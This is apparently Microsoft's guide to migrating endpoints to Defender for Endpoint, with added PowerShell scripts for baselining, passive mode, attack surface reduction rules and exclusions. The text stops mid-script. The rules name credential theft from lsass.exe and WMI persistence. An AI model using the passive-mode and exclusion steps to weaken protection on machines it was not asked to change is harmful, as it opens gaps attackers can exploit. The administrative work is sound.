Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

If you're ready to move from a non-Microsoft endpoint protection solution to Microsoft
Defender for Endpoint, or you're interested in what's involved in the process, use this
article as a guide. This article describes the overall process of moving to Defender for
Endpoint Plan 1 or Plan 2. The following image depicts the migration process at a high
level:

When you migrate to Defender for Endpoint, you begin with your non-Microsoft
antivirus/antimalware protection in active mode. Then, you configure Microsoft
Defender Antivirus in passive mode, and configure Defender for Endpoint features.
Then, you onboard your organization's devices, and verify that everything is working
correctly. Finally, you remove the non-Microsoft solution from your devices.

The migration process

The process of migrating to Defender for Endpoint can be divided into three phases, as
described in the following table:

Phase: Prepare for your migration
Description: During the Prepare phase:
1. Update your organization's devices.
2. Get Defender for Endpoint Plan 1 or Plan 2.
3. Plan roles and permissions for your security team, and grant them access to the
Microsoft Defender portal.
4. Configure your device proxy and internet settings to enable communication between
your organization's devices and Defender for Endpoint.
5. Get baseline performance data for the devices that are onboarded to Defender for
Endpoint.

Phase: Set up Defender for Endpoint
Description: During the Setup phase:
1. Enable/reinstall Microsoft Defender Antivirus, and make sure it's in passive mode
on devices.
2. Configure your Defender for Endpoint Plan 1 or Plan 2 capabilities.
3. Add Defender for Endpoint to the exclusion list for your existing solution.
4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.
5. Set up your device groups, collections, and organizational units.

Phase: Onboard to Defender for Endpoint
Description: During the Onboard phase:
1. Onboard your devices to Defender for Endpoint.
2. Run a detection test to confirm that onboarding was successful.
3. Confirm that Microsoft Defender Antivirus is running in passive mode.
4. Get updates for Microsoft Defender Antivirus.
5. Uninstall your existing endpoint protection solution.
6. Make sure that Defender for Endpoint is working correctly.

Next step
Proceed to Prepare for your migration.


Migrate to Microsoft Defender for Endpoint - Phase 1: Prepare
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Phase 1: Prepare (you're here) | Phase 2: Set up | Phase 3: Onboard

Welcome to the Prepare phase of migrating to Defender for Endpoint.

This migration phase includes the following steps:

1. Get and deploy updates across your organization's devices.
2. Get Microsoft Defender for Endpoint Plan 1 or Plan 2.
3. Grant access to the Microsoft Defender portal.
4. Review more information about device proxy and internet connectivity settings.
5. Capture performance baseline data from the endpoint.

Step 1: Get and deploy updates across your organization's devices

As a best practice, keep your organization's devices and endpoints up to date. Make
sure your existing endpoint protection and antivirus solution is up to date, and that your
organization's operating systems and apps also have the latest updates. Getting updates
installed now can help prevent problems later as you migrate to Defender for Endpoint
and employ Microsoft Defender Antivirus on all your devices.

Make sure your existing solution is up to date

Keep your existing endpoint protection solution up to date, and make sure that your
organization's devices have the latest security updates. Make sure to review your
solution provider's documentation for updates.

Make sure your organization's devices are up to date

Need help with updating your organization's devices? See the following resources:

Windows: Microsoft Update
macOS: How to update the software on your Mac
iOS: Update your iPhone, iPad, or iPod touch
Android: Check & update your Android version
Linux: Linux 101: Updating Your System

Step 2: Get Microsoft Defender for Endpoint Plan 1 or Plan 2

Now that you've updated your organization's devices, the next step is to get Defender
for Endpoint, assign licenses, and make sure the service is provisioned.

1. Buy or try Defender for Endpoint today. Start a free trial or request a quote.
Microsoft 365 E3 includes Defender for Endpoint Plan 1, and Microsoft 365 E5
includes Defender for Endpoint Plan 2.

2. Verify that your licenses are properly provisioned. Check your license state.

3. Set up your dedicated cloud instance of Defender for Endpoint. See Defender for
Endpoint setup: Tenant configuration.

4. If any devices in your organization use a proxy to access the internet, follow the
guidance in Defender for Endpoint setup: Network configuration.

At this point, you're ready to grant access to your security administrators and security
operators to use the Microsoft Defender portal.

Step 3: Grant access to the Microsoft Defender portal

The Microsoft Defender portal is where you and your security team access and
configure features and capabilities of Defender for Endpoint. To learn more, see
Overview of the Microsoft Defender portal.

Permissions to the Microsoft Defender portal can be granted by using either basic
permissions or role-based access control (RBAC). We recommend using RBAC so that
you have more granular control over permissions.

1. Plan the roles and permissions for your security administrators and security
operators. See Role-based access control.

2. Set up and configure RBAC. We recommend using Intune to configure RBAC,
especially if your organization is using a combination of Windows, macOS, iOS,
and Android devices. See setting up RBAC using Intune.

If your organization requires a method other than Intune, choose one of the
following options:

Configuration Manager
Advanced Group Policy Management
Windows Admin Center

3. Grant your security team access to the Microsoft Defender portal. (Need help? See
Manage portal access using RBAC.)

Step 4: View information about device proxy and internet connectivity settings

To enable communication between your devices and Defender for Endpoint, you might
have to configure proxy and internet settings. The following table includes links to
resources you can use to configure your proxy and internet settings for various
operating systems:

Subscription: Defender for Endpoint Plan 1
Operating systems: Windows 11; Windows 10; Windows Server 2022; Windows Server 2019;
Windows Server 1803, or later; Windows Server 2016*; Windows Server 2012 R2*
Resources: Configure and validate Microsoft Defender Antivirus network connections

Subscription: Defender for Endpoint Plan 1
Operating systems: macOS (see System requirements)
Resources: Defender for Endpoint on macOS: Network connections

Subscription: Defender for Endpoint Plan 1
Operating systems: Linux (see System requirements)
Resources: Defender for Endpoint on Linux: Network connections

Subscription: Defender for Endpoint Plan 2
Operating systems: Windows 11; Windows 10; Windows Server 2022; Windows Server 2019;
Windows Server 1803, or later; Windows Server 2016*; Windows Server 2012 R2*
Resources: Configure machine proxy and internet connectivity settings

Subscription: Defender for Endpoint Plan 2
Operating systems: Windows Server 2008 R2 SP1; Windows 8.1; Windows 7 SP1
Resources: Configure proxy and internet connectivity settings

Subscription: Defender for Endpoint Plan 2
Operating systems: macOS (see System requirements)
Resources: Defender for Endpoint on macOS: Network connections

* Windows Server 2016 and Windows Server 2012 R2 require installation of the modern,
unified solution for Windows Server 2012 R2 and 2016. For more information, see
Onboard Windows servers to Defender for Endpoint: Windows Server 2012 R2 and
Windows Server 2016.

Important

The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include
server licenses. To onboard servers, you'll need an additional license, such as either
Microsoft Defender for Servers Plan 1 or Plan 2. To learn more, see Defender for
Endpoint onboarding Windows Server.

Step 5: Capture performance baseline data from the endpoint

When migrating from one antivirus product to Microsoft Defender Antivirus, your
organization's help desk will be watching for anything new. Thus, if you already had an
application that was running hot (high CPU usage), their first troubleshooting step might
be to disable Microsoft Defender Antivirus. Before doing that, we highly recommend
capturing performance data from endpoints that have or will have Defender for
Endpoint installed.

Performance data should include the process list, CPU usage (aggregate across all
cores), memory usage, and disk space availability on all mounted partitions. This
information helps determine whether what you are seeing is normal or unexpected after
onboarding devices to Defender for Endpoint.

One of the tools that you can use is the Performance Monitor (perfmon). You can use it
to collect a performance baseline of your Windows or Windows Server endpoint. See
Setting a local perfmon in a Windows client or Windows Server.
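A scripted alternative to a perfmon data collector set for the baseline described above, capturing the four items the article lists (process list, aggregate CPU, memory, and free space on mounted partitions) into a JSON file that can be diffed after onboarding. This is an added example and not Microsoft's guidance; it assumes Windows PowerShell 5.1 or later on a Windows client or server, and the output folder, sample count and process count are constructed defaults.

```powershell
# Added example: point-in-time performance baseline for one endpoint, saved as JSON
# so that a post-onboarding capture can be compared with it.
# Assumes Windows PowerShell 5.1+ on Windows; output path is a constructed default.

function Get-EndpointPerformanceBaseline {
    param(
        [int]    $CpuSamples   = 5,    # 1-second CPU samples to average
        [int]    $TopProcesses = 15,   # processes to keep, ranked by CPU time
        [string] $OutputPath   = "$env:ProgramData\MdeMigration\baseline-$($env:COMPUTERNAME)-$(Get-Date -Format yyyyMMdd-HHmm).json"
    )

    # CPU usage aggregated across all cores, averaged over the sampling window.
    $cpu = (Get-Counter '\Processor(_Total)\% Processor Time' -SampleInterval 1 -MaxSamples $CpuSamples).CounterSamples |
        Measure-Object -Property CookedValue -Average

    # Memory: Win32_OperatingSystem reports these values in KB.
    $os         = Get-CimInstance Win32_OperatingSystem
    $memTotalMB = [math]::Round($os.TotalVisibleMemorySize / 1KB)
    $memFreeMB  = [math]::Round($os.FreePhysicalMemory / 1KB)

    # Disk space on every mounted fixed partition (DriveType 3 = local disk).
    $disks = Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 3' | ForEach-Object {
        [pscustomobject]@{
            Drive   = $_.DeviceID
            SizeGB  = [math]::Round($_.Size / 1GB, 1)
            FreeGB  = [math]::Round($_.FreeSpace / 1GB, 1)
            FreePct = if ($_.Size) { [math]::Round(100 * $_.FreeSpace / $_.Size, 1) } else { $null }
        }
    }

    # Process list ranked by accumulated CPU time, so an app "running hot" stands out.
    $procs = Get-Process | Sort-Object CPU -Descending | Select-Object -First $TopProcesses |
        ForEach-Object {
            [pscustomobject]@{
                Name         = $_.ProcessName
                Id           = $_.Id
                CpuSeconds   = [math]::Round([double]$_.CPU, 1)
                WorkingSetMB = [math]::Round($_.WorkingSet64 / 1MB, 1)
            }
        }

    $baseline = [pscustomobject]@{
        Computer      = $env:COMPUTERNAME
        CapturedUtc   = (Get-Date).ToUniversalTime().ToString('o')
        CpuPercentAvg = [math]::Round($cpu.Average, 1)
        MemoryTotalMB = $memTotalMB
        MemoryFreeMB  = $memFreeMB
        Disks         = $disks
        TopProcesses  = $procs
    }

    New-Item -ItemType Directory -Path (Split-Path $OutputPath) -Force | Out-Null
    $baseline | ConvertTo-Json -Depth 4 | Set-Content -Path $OutputPath -Encoding UTF8
    $baseline
}

# Usage: capture before onboarding, capture again afterwards, compare the two files.
Get-EndpointPerformanceBaseline |
    Format-List Computer, CapturedUtc, CpuPercentAvg, MemoryTotalMB, MemoryFreeMB
```

Collect the baseline at the same time of day and under the same workload as the later comparison; a single sample taken during a backup window or a scan will make any post-onboarding numbers look better than they are.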

Next step
Congratulations! You've completed the Prepare phase of switching to Defender for
Endpoint!

Proceed to set up Defender for Endpoint.


Migrate to Microsoft Defender for Endpoint - Phase 2: Setup
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Phase 1: Prepare | Phase 2: Set up (you're here) | Phase 3: Onboard

Welcome to the Setup phase of migrating to Defender for Endpoint. This phase
includes the following steps:

1. Reinstall/enable Microsoft Defender Antivirus on your endpoints.
2. Configure Defender for Endpoint Plan 1 or Plan 2.
3. Add Defender for Endpoint to the exclusion list for your existing solution.
4. Add your existing solution to the exclusion list for Microsoft Defender Antivirus.
5. Set up your device groups, device collections, and organizational units.

Step 1: Reinstall/enable Microsoft Defender Antivirus on your endpoints

On certain versions of Windows, Microsoft Defender Antivirus was likely uninstalled or
disabled when your non-Microsoft antivirus/antimalware solution was installed. When
endpoints running Windows are onboarded to Defender for Endpoint, Microsoft
Defender Antivirus can run in passive mode alongside a non-Microsoft antivirus
solution. To learn more, see Antivirus protection with Defender for Endpoint.

As you're making the switch to Defender for Endpoint, you might need to take certain
steps to reinstall or enable Microsoft Defender Antivirus. The following table describes
what to do on your Windows clients and servers.

Endpoint type: Windows clients (such as endpoints running Windows 10 and Windows 11)
What to do: In general, you don't need to take any action for Windows clients (unless
Microsoft Defender Antivirus has been uninstalled). In general, Microsoft Defender
Antivirus should still be installed, but is most likely disabled at this point of the
migration process.

When a non-Microsoft antivirus/antimalware solution is installed and the clients aren't
yet onboarded to Defender for Endpoint, Microsoft Defender Antivirus is disabled
automatically. Later, when the client endpoints are onboarded to Defender for
Endpoint, if those endpoints are running a non-Microsoft antivirus solution, Microsoft
Defender Antivirus goes into passive mode.

If the non-Microsoft antivirus solution is uninstalled, Microsoft Defender Antivirus goes
into active mode automatically.

Endpoint type: Windows servers
What to do: On Windows Server, you need to reinstall Microsoft Defender Antivirus, and
set it to passive mode manually. On Windows servers, when a non-Microsoft
antivirus/antimalware is installed, Microsoft Defender Antivirus can't run alongside the
non-Microsoft antivirus solution. In those cases, Microsoft Defender Antivirus is
disabled or uninstalled manually.

To reinstall or enable Microsoft Defender Antivirus on Windows Server, perform the
following tasks:
- Re-enable Defender Antivirus on Windows Server if it was disabled
- Re-enable Defender Antivirus on Windows Server if it was uninstalled
- Set Microsoft Defender Antivirus to passive mode on Windows Server

If you run into issues reinstalling or re-enabling Microsoft Defender Antivirus on
Windows Server, see Troubleshooting: Microsoft Defender Antivirus is getting
uninstalled on Windows Server.

Tip

To learn more about Microsoft Defender Antivirus states with non-Microsoft
antivirus protection, see Microsoft Defender Antivirus compatibility.

Set Microsoft Defender Antivirus to passive mode on Windows Server

Tip

You can now run Microsoft Defender Antivirus in passive mode on Windows Server
2012 R2 and 2016. For more information, see Options to install Microsoft
Defender for Endpoint.

1. Open Registry Editor, and then navigate to
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat
Protection.

2. Edit (or create) a DWORD entry called ForceDefenderPassiveMode, and specify the
following settings:

Set the DWORD's value to 1.

Under Base, select Hexadecimal.

If Microsoft Defender Antivirus features and installation files were previously removed
from Windows Server 2016, follow the guidance in Configure a Windows Repair Source
to restore the feature installation files.

Note

After onboarding to Defender for Endpoint, you might have to set Microsoft
Defender Antivirus to passive mode on Windows Server. To validate that passive
mode was set as expected, search for Event 5007 in the Microsoft-Windows-
Windows Defender Operational log (located at C:\Windows\System32\winevt\Logs ),
and confirm that either the ForceDefenderPassiveMode or PassiveMode registry
keys were set to 0x1.
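The registry steps above and the validation in the note, as one script: it writes the ForceDefenderPassiveMode DWORD under the path the article names and then checks the result from three angles (the registry value, Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, and the AMRunningMode field of Get-MpComputerStatus). This is an added example, not Microsoft's own script; it assumes an elevated PowerShell window on Windows Server with the Defender PowerShell module present, and the 24-hour event lookback is a constructed default.

```powershell
# Added example: set ForceDefenderPassiveMode and validate it on Windows Server.
# Run from an elevated PowerShell window. The registry path is the one the article
# gives; the lookback window for event 5007 is a constructed default.

$regPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

function Set-DefenderPassiveMode {
    # Create the key if it doesn't exist, then write the DWORD value 1 (0x1).
    if (-not (Test-Path $regPath)) {
        New-Item -Path $regPath -Force | Out-Null
    }
    New-ItemProperty -Path $regPath -Name ForceDefenderPassiveMode `
        -PropertyType DWord -Value 1 -Force | Out-Null
    (Get-ItemProperty -Path $regPath).ForceDefenderPassiveMode
}

function Test-DefenderPassiveMode {
    param([int] $LookbackHours = 24)

    # The registry value as written.
    $regValue = (Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue).ForceDefenderPassiveMode

    # Event 5007 is logged for every configuration change; keep only the entries
    # that record ForceDefenderPassiveMode or PassiveMode being set to 0x1.
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '(ForceDefenderPassiveMode|PassiveMode)' -and
                       $_.Message -match '0x1' }

    # AMRunningMode reports the mode the platform is actually running in.
    $status = Get-MpComputerStatus

    [pscustomobject]@{
        RegistryValue     = $regValue
        PassiveModeEvents = @($events).Count
        LastEventTime     = ($events | Select-Object -First 1).TimeCreated
        AMRunningMode     = $status.AMRunningMode
        IsPassive         = ($status.AMRunningMode -eq 'Passive Mode')
    }
}

# Usage:
Set-DefenderPassiveMode
Test-DefenderPassiveMode | Format-List
```

A registry value of 1 with no matching 5007 event and AMRunningMode still reporting Normal usually means the platform has not re-read its configuration yet or the device is not onboarded; re-run the check after the service restarts or the onboarding completes rather than assuming the setting failed.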

Are you using Windows Server 2012 R2 or Windows Server 2016?

You can now run Microsoft Defender Antivirus in passive mode on Windows Server 2012
R2 and 2016 using the method described in the previous section. For more information,
see Options to install Microsoft Defender for Endpoint.

Step 2: Configure Defender for Endpoint Plan 1 or Plan 2

Important

This article describes how to configure your Defender for Endpoint capabilities
before devices are onboarded.
If you have Defender for Endpoint Plan 1, complete steps 1-5 in the following
procedure.
If you have Defender for Endpoint Plan 2, complete steps 1-7 in the following
procedure.

1. Make sure Defender for Endpoint is provisioned. As a global admin, go to the
Microsoft Defender portal (https://security.microsoft.com) and sign in. Then, in
the navigation pane, select Assets > Devices.

The following table shows what your screen might look like and what it means.

Screen: (image)
What it means: Defender for Endpoint isn't finished provisioning yet. You might have
to wait a little while for the process to finish.

Screen: (image)
What it means: Defender for Endpoint is provisioned. In this case, proceed to the next
step.

2. Turn on tamper protection. We recommend turning tamper protection on for your
whole organization. You can do this task in the Microsoft Defender portal
(https://security.microsoft.com).

a. In the Microsoft Defender portal, choose Settings > Endpoints.


b. Go to General > Advanced features, and then set the toggle for tamper
protection to On.

c. Select Save.

Learn more about tamper protection.

3. If you're going to use either Microsoft Intune or Microsoft Endpoint Configuration
Manager to onboard devices and configure device policies, set up integration with
Defender for Endpoint by following these steps:

a. In the Microsoft Intune admin center (https://endpoint.microsoft.com), go to
Endpoint security.

b. Under Setup, choose Microsoft Defender for Endpoint.

c. Under Endpoint Security Profile Settings, set the toggle for Allow Microsoft
Defender for Endpoint to enforce Endpoint Security Configurations to On.

d. Near the top of the screen, select Save.

e. In the Microsoft Defender portal (https://security.microsoft.com), choose
Settings > Endpoints.

f. Scroll down to Configuration management, and select Enforcement scope.

g. Set the toggle for Use MDE to enforce security configuration settings from
MEM to On, and then select the options for both Windows client and Windows
Server devices.

h. If you're planning to use Configuration Manager, set the toggle for Manage
Security settings using Configuration Manager to On. (If you need help with
this step, see Coexistence with Microsoft Endpoint Configuration Manager.)

i. Scroll down and select Save.

4. Configure your initial attack surface reduction capabilities. At a minimum, enable
the standard protection rules that are listed in the following table right away:

Standard protection rules:
- Block credential stealing from the Windows local security authority subsystem
(lsass.exe)
- Block abuse of exploited vulnerable signed drivers
- Block persistence through Windows Management Instrumentation (WMI) event
subscription

Configuration methods:
- Intune (Device configuration profiles or Endpoint Security policies)
- Mobile Device Management (MDM) (Use the
./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules configuration
service provider (CSP) to individually enable and set the mode for each rule.)
- Group Policy or PowerShell (only if you're not using Intune, Configuration Manager,
or another enterprise-level management platform)

Learn more about attack surface reduction capabilities.

5. Configure your next-generation protection capabilities.

Intune:
1. In the Intune admin center, select Devices > Configuration profiles, and then
select the profile type you want to configure. If you haven't yet created a Device
restrictions profile type, or if you want to create a new one, see Configure device
restriction settings in Microsoft Intune.
2. Select Properties, and then select Configuration settings: Edit.
3. Expand Microsoft Defender Antivirus.
4. Enable Cloud-delivered protection.
5. In the Prompt users before sample submission dropdown, select Send all samples
automatically.
6. In the Detect potentially unwanted applications dropdown, select Enable or Audit.
7. Select Review + save, and then choose Save.
TIP: For more information about Intune device profiles, including how to create and
configure their settings, see What are Microsoft Intune device profiles?.

Configuration Manager:
See Create and deploy antimalware policies for Endpoint Protection in Configuration
Manager. When you create and configure your antimalware policies, make sure to review
the real-time protection settings and enable block at first sight.

Advanced Group Policy Management or Group Policy Management Console:
1. Go to Computer configuration > Administrative templates > Windows components >
Microsoft Defender Antivirus.
2. Look for a policy called Turn off Microsoft Defender Antivirus.
3. Choose Edit policy setting, and make sure that policy is disabled. This action
enables Microsoft Defender Antivirus. (You might see Windows Defender Antivirus
instead of Microsoft Defender Antivirus in some versions of Windows.)

Control Panel in Windows:
Follow the guidance here: Turn on Microsoft Defender Antivirus. (You might see Windows
Defender Antivirus instead of Microsoft Defender Antivirus in some versions of
Windows.)
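The PowerShell route that steps 4 and 5 above list for devices that are not managed by Intune or Configuration Manager, as one added example (not Microsoft's own script): it enables the three standard protection rules, sets the next-generation protection settings the Intune table names (cloud-delivered protection, automatic sample submission, PUA detection, real-time protection and block at first sight), and reads the result back with Get-MpPreference. The rule GUIDs are not on this page; they are taken from Microsoft's published attack surface reduction rules reference and should be verified against it before use. It assumes an elevated PowerShell window on a Windows device with Microsoft Defender Antivirus.

```powershell
# Added example: configure the standard protection ASR rules and baseline
# next-generation protection settings with the Defender PowerShell module.
# Rule GUIDs come from Microsoft's ASR rules reference (not from this page);
# confirm them against that reference. Run elevated.

$standardProtectionRules = @{
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)'
    '56a863a9-875e-4185-98a7-b882c64b5ce5' = 'Block abuse of exploited vulnerable signed drivers'
    'e6db77e5-3df2-4cf1-b95a-636979351e5b' = 'Block persistence through WMI event subscription'
}
$asrActionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Enable-StandardProtectionRules {
    param([switch] $AuditOnly)   # start in audit mode to measure impact first
    $action = if ($AuditOnly) { 'AuditMode' } else { 'Enabled' }
    foreach ($id in $standardProtectionRules.Keys) {
        # Add-MpPreference merges with rules already configured instead of replacing them.
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                         -AttackSurfaceReductionRules_Actions $action
    }
}

function Set-NextGenProtectionBaseline {
    # Step 5 settings: cloud-delivered protection (MAPS Advanced), send all samples,
    # PUA detection on, real-time protection on, block at first sight on.
    Set-MpPreference -MAPSReporting Advanced `
                     -SubmitSamplesConsent SendAllSamples `
                     -PUAProtection Enabled `
                     -DisableRealtimeMonitoring $false `
                     -DisableBlockAtFirstSeen $false
}

function Test-ProtectionBaseline {
    $p    = Get-MpPreference
    $ids  = @($p.AttackSurfaceReductionRules_Ids)
    $acts = @($p.AttackSurfaceReductionRules_Actions)

    $rules = foreach ($id in $standardProtectionRules.Keys) {
        # Rule ids are compared case-insensitively; the platform may return them uppercased.
        $index = -1
        for ($k = 0; $k -lt $ids.Count; $k++) {
            if ($ids[$k] -ieq $id) { $index = $k; break }
        }
        [pscustomobject]@{
            Rule   = $standardProtectionRules[$id]
            Action = if ($index -ge 0) { $asrActionNames[[int]$acts[$index]] } else { 'NotConfigured' }
        }
    }

    [pscustomobject]@{
        CloudProtection   = $p.MAPSReporting          # 2 = Advanced
        SampleSubmission  = $p.SubmitSamplesConsent   # 3 = SendAllSamples
        PuaProtection     = $p.PUAProtection          # 1 = Enabled
        RealtimeOn        = -not $p.DisableRealtimeMonitoring
        BlockAtFirstSight = -not $p.DisableBlockAtFirstSeen
        AsrRules          = $rules
    }
}

Enable-StandardProtectionRules
Set-NextGenProtectionBaseline
$check = Test-ProtectionBaseline
$check | Format-List CloudProtection, SampleSubmission, PuaProtection, RealtimeOn, BlockAtFirstSight
$check.AsrRules | Format-Table -AutoSize
```

Run the rules in audit mode first (the -AuditOnly switch) on a pilot group if you have line-of-business software that loads drivers or uses WMI subscriptions, then switch to block once the audit events show no legitimate activity being flagged. Remember that these local settings are overridden once an Intune or Configuration Manager policy targets the device.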

If you have Defender for Endpoint Plan 1, your initial setup and configuration is done
for now. If you have Defender for Endpoint Plan 2, continue to steps 6-7.

6. Configure your endpoint detection and response (EDR) policies in the Intune
admin center (https://endpoint.microsoft.com). To get help with this task, see
Create EDR policies.

7. Configure your automated investigation and remediation capabilities in the
Microsoft Defender portal (https://security.microsoft.com). To get help with this
task, see Configure automated investigation and remediation capabilities in
Microsoft Defender for Endpoint.

At this point, initial setup and configuration of Defender for Endpoint Plan 2 is
complete.

Step 3: Add Microsoft Defender for Endpoint to the exclusion list for your existing
solution

This step of the setup process involves adding Defender for Endpoint to the exclusion
list for your existing endpoint protection solution and any other security products your
organization is using. Make sure to refer to your solution provider's documentation to
add exclusions.

The specific exclusions to configure depend on which version of Windows your
endpoints or devices are running, and are listed in the following table.

OS: Windows 11; Windows 10, version 1803 or later (See Windows 10 release
information); Windows 10, version 1703 or 1709 with KB4493441 installed
Exclusions:
C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseSC.exe
C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection
C:\Program Files\Windows Defender Advanced Threat Protection\SenseTVM.exe

OS: Windows Server 2022; Windows Server 2019; Windows Server 2016; Windows Server
2012 R2; Windows Server, version 1803
Exclusions: On Windows Server 2012 R2 and Windows Server 2016 running the modern,
unified solution, the following exclusions are required after updating the Sense EDR
component using KB5005292:
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\MsSense.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCnCProxy.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseIR.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCE.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseSampleUploader.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCM.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseTVM.exe

OS: Windows 8.1; Windows 7; Windows Server 2008 R2 SP1
Exclusions:
C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Monitoring Host Temporary Files 6\45\MsSenseS.exe
NOTE: Monitoring Host Temporary Files 6\45 can be different numbered subfolders.
C:\Program Files\Microsoft Monitoring Agent\Agent\AgentControlPanel.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\MOMPerfSnapshotHelper.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\TestCloudConnection.exe

) Important
As a best practice, keep your organization's devices and endpoints up to date.
Make sure to get the latest updates for Microsoft Defender for Endpoint and
Microsoft Defender Antivirus, and keep your organization's operating systems and
productivity apps up to date.

Step 4: Add your existing solution to the exclusion list for Microsoft Defender Antivirus

During this step of the setup process, you add your existing solution to the list of exclusions for Microsoft Defender Antivirus. You can choose from several methods to add your exclusions to Microsoft Defender Antivirus, as listed in the following table:

Method: Intune
  1. Go to the Microsoft Intune admin center and sign in.
  2. Select Devices > Configuration profiles, and then select the profile that you want to configure.
  3. Under Manage, select Properties.
  4. Select Configuration settings: Edit.
  5. Expand Microsoft Defender Antivirus, and then expand Microsoft Defender Antivirus Exclusions.
  6. Specify the files and folders, extensions, and processes to exclude from Microsoft Defender Antivirus scans. For reference, see Microsoft Defender Antivirus exclusions.
  7. Choose Review + save, and then choose Save.

Method: Microsoft Endpoint Configuration Manager
  1. Using the Configuration Manager console, go to Assets and Compliance > Endpoint Protection > Antimalware Policies, and then select the policy that you want to modify.
  2. Specify exclusion settings for files and folders, extensions, and processes to exclude from Microsoft Defender Antivirus scans.

Method: Group Policy
  1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you want to configure, and then select Edit.
  2. In the Group Policy Management Editor, go to Computer configuration and select Administrative templates.
  3. Expand the tree to Windows components > Microsoft Defender Antivirus > Exclusions. (You might see Windows Defender Antivirus instead of Microsoft Defender Antivirus in some versions of Windows.)
  4. Double-click the Path Exclusions setting and add the exclusions.
  5. Set the option to Enabled.
  6. Under the Options section, select Show....
  7. Specify each folder on its own line under the Value name column. If you specify a file, make sure to enter a fully qualified path to the file, including the drive letter, folder path, filename, and extension. Enter 0 in the Value column.
  8. Select OK.
  9. Double-click the Extension Exclusions setting and add the exclusions.
  10. Set the option to Enabled.
  11. Under the Options section, select Show....
  12. Enter each file extension on its own line under the Value name column. Enter 0 in the Value column.
  13. Select OK.

Method: Local group policy object
  1. On the endpoint or device, open the Local Group Policy Editor.
  2. Go to Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Exclusions. (You might see Windows Defender Antivirus instead of Microsoft Defender Antivirus in some versions of Windows.)
  3. Specify your path and process exclusions.

Method: Registry key
  1. Export the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\exclusions
  2. Import the registry key. Here are two examples:
     - Local path: regedit.exe /s c:\temp\MDAV_Exclusion.reg
     - Network share: regedit.exe /s \\FileServer\ShareName\MDAV_Exclusion.reg
Learn more about exclusions for Microsoft Defender for Endpoint and Microsoft
Defender Antivirus.

Keep the following points about exclusions in mind

When you add exclusions to Microsoft Defender Antivirus scans, you should add path and process exclusions.

- Path exclusions exclude specific files and whatever those files access.
- Process exclusions exclude whatever a process touches, but don't exclude the process itself.
- List your process exclusions using their full path and not by their name only. (The name-only method is less secure: any file with the same name, wherever it's placed, would inherit the exclusion.)
- If you list each executable (.exe) as both a path exclusion and a process exclusion, the process and whatever it touches are excluded.
- Every exclusion is a gap in coverage. Limit exclusions to the binaries and folders your existing solution actually needs, and remove them once that solution is uninstalled (Phase 3, Step 5).
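As an added example (not part of the original article), the same path and process exclusions can be set locally with the Defender PowerShell module, which is useful on a pilot device before you push them through Intune, Configuration Manager, or Group Policy. The vendor folder and executable names below are hypothetical placeholders; substitute the ones your existing solution's vendor documents.

```powershell
# Added example (not from the original article): add path and process exclusions for an
# existing non-Microsoft endpoint solution with the Defender PowerShell module, then verify
# them. Everything under $existingSolutionRoot is a hypothetical placeholder.
# Run in an elevated PowerShell session on the endpoint.

$existingSolutionRoot = 'C:\Program Files\ExampleVendor\Agent'   # assumption: your product's install folder

# Exclude only the specific executables, by full path, not by file name alone.
# A name-only process exclusion would also cover any file an attacker gives the same name.
$processExclusions = @(
    (Join-Path $existingSolutionRoot 'ExampleAgent.exe')
    (Join-Path $existingSolutionRoot 'ExampleScanner.exe')
)
$pathExclusions = @(
    (Join-Path $existingSolutionRoot 'Quarantine')
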